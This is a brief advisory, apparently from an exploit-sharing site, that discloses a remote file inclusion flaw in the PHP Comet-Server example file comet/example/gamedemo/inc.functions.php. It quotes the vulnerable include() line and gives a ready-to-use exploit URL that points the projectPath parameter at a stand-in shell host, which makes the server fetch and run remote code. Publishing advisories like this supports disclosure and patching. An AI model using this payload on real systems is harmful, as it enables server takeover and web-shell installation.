The PHP Comet-Server application may suffer from a remote file inclusion vulnerability.
3cfb90496a5cc27853237bc1398d79b98d471afd586bfbe548fdc72d215b15e8
Discovered by: MasTerX
----------------
_Bug in :
comet/example/gamedemo/inc.functions.php
_Vlu Code :
include($projectPath."/inc.var.php");
http://site.com/path/example/gamedemo/inc.functions.php?projectPath=http://SHELLURL.COM?